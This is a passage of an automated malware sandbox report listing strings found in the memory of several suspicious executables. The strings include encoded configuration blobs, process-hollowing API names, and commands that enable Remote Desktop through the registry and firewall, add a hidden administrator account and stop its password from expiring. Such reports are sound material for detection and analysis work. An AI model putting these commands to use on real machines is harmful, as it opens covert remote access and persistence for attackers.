RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: rapes.exe, 00000010.00000003.1782574386.0000000005060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                                Source: rapes.exe, 00000010.00000003.1782574386.0000000005060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: nhDLtPT.exeString found in binary or memory: net start termservice
                                                Source: nhDLtPT.exe, 00000014.00000000.1879098792.0000000000C01000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: net start termservice
                                                Source: nhDLtPT.exe, 00000014.00000000.1879098792.0000000000C01000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                                                Source: nhDLtPT.exe, 00000014.00000002.1886421735.0000000000C01000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: net start termservice
                                                Source: nhDLtPT.exe, 00000014.00000002.1886421735.0000000000C01000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nable=Yessc config termservice start= autonet start termservice" /add /y" "net user "" /addnet localgroup "Administrators" "'" SET PasswordExpires=FALSEWMIC USERACCOUNT WHERE "Name = ''" SET Passwordchangeable=FALSEw01--E'' -DestinationPath 'powershell -Command Expand-Archive -Path '%d
                                                Source: Gxtuum.exeString found in binary or memory: net start termservice
                                                Source: Gxtuum.exe, 00000015.00000002.1888300853.0000000000D01000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                                                Source: Gxtuum.exe, 00000015.00000002.1888300853.0000000000D01000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                                                Source: Gxtuum.exe, 00000015.00000000.1885044491.0000000000D01000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                                                Source: Gxtuum.exe, 00000015.00000000.1885044491.0000000000D01000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                                                Source: Gxtuum.exe, 00000016.00000000.1887736305.0000000000D01000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                                                Source: Gxtuum.exe, 00000016.00000000.1887736305.0000000000D01000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j 